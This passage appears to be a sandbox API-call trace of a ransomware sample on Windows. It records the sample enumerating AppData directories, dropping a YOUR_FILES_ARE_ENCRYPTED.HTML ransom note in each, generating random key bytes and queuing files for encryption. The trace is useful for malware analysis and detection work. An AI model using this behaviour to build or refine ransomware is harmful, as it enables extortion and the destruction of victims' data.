lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\LocalCache" [0118.505] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\LocalCache\\*" [0118.505] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x558439bd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558439bd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558439bd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0118.506] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x558439bd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558439bd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558439bd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0118.506] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x558439bd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558439bd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558439bd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0118.506] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0118.506] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0118.506] GetProcessHeap () returned 0x600000 [0118.506] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.506] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cloudexperiencehost_cw5n1h2txyewy\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.507] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.508] CloseHandle (hObject=0x324) returned 1 [0118.509] GetProcessHeap () returned 0x600000 [0118.509] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.509] GetProcessHeap () returned 0x600000 [0118.509] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.509] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x557f750e, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x557f750e, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x557f750e, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0118.509] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.509] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\LocalState") returned 111 [0118.509] GetProcessHeap () returned 0x600000 [0118.509] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.510] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\LocalState" [0118.510] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\LocalState\\*" [0118.510] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x557f750e, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x557f750e, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x557f750e, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0118.510] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x557f750e, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x557f750e, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x557f750e, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0118.511] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x557f750e, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x557f750e, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x557f750e, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0118.511] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0118.511] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0118.511] GetProcessHeap () returned 0x600000 [0118.511] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.511] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cloudexperiencehost_cw5n1h2txyewy\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.512] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.513] CloseHandle (hObject=0x324) returned 1 [0118.513] GetProcessHeap () returned 0x600000 [0118.513] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.513] GetProcessHeap () returned 0x600000 [0118.513] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.514] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x559e7456, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x559e7456, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x559e7456, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy", cAlternateFileName="MICROS~1.0_N")) returned 1 [0118.514] StrStrIW (lpFirst="Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.514] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy") returned 181 [0118.514] GetProcessHeap () returned 0x600000 [0118.514] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.515] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy" [0118.515] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\*" [0118.515] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x559e7456, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x559e7456, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x559e7456, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0118.515] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x559e7456, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x559e7456, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x559e7456, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0118.515] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x559e7456, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x559e7456, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x559e7456, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0118.515] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.515] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore") returned 197 [0118.516] GetProcessHeap () returned 0x600000 [0118.516] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0118.517] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore" [0118.517] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*" [0118.517] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x559e7456, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x559e7456, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x559e7456, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315f7c8, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626838 [0118.518] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x559e7456, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x559e7456, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x559e7456, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315f7c8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0118.518] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x559e7456, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x55a59bef, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x55a59bef, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x315f7c8, dwReserved1=0x63d098, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0118.518] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.518] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned 217 [0118.518] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0118.518] lstrlenW (lpString=".dat") returned 4 [0118.518] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0118.518] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0118.518] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cloudexperiencehost_cw5n1h2txyewy\\microsoft.windows.cloudexperiencehost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0118.519] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=32768) returned 1 [0118.519] GetProcessHeap () returned 0x600000 [0118.519] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0118.521] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="34") returned 2 [0118.521] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="3E") returned 2 [0118.521] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="E1") returned 2 [0118.521] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="82") returned 2 [0118.521] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="A1") returned 2 [0118.521] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="A6") returned 2 [0118.521] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="27") returned 2 [0118.521] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="E9") returned 2 [0118.521] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="1C") returned 2 [0118.521] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="BE") returned 2 [0118.521] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="E3") returned 2 [0118.521] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="D4") returned 2 [0118.522] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="7D") returned 2 [0118.522] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="CF") returned 2 [0118.522] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="E9") returned 2 [0118.522] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="48") returned 2 [0118.522] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="B8") returned 2 [0118.522] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="86") returned 2 [0118.522] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="D9") returned 2 [0118.522] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="CF") returned 2 [0118.522] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="6C") returned 2 [0118.522] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="6E") returned 2 [0118.522] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="09") returned 2 [0118.522] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="18") returned 2 [0118.522] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="99") returned 2 [0118.522] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="26") returned 2 [0118.522] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="65") returned 2 [0118.522] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="9E") returned 2 [0118.522] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="C9") returned 2 [0118.522] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="E7") returned 2 [0118.522] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="5C") returned 2 [0118.522] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="7F") returned 2 [0118.523] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" [0118.523] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0118.523] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0118.523] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x559e7456, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x559e7456, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x559e7456, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x315f7c8, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0118.523] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.523] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG1") returned 222 [0118.523] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0118.523] lstrlenW (lpString=".LOG1") returned 5 [0118.523] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0118.523] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x559e7456, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x559e7456, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x559e7456, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315f7c8, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0118.523] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.523] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: 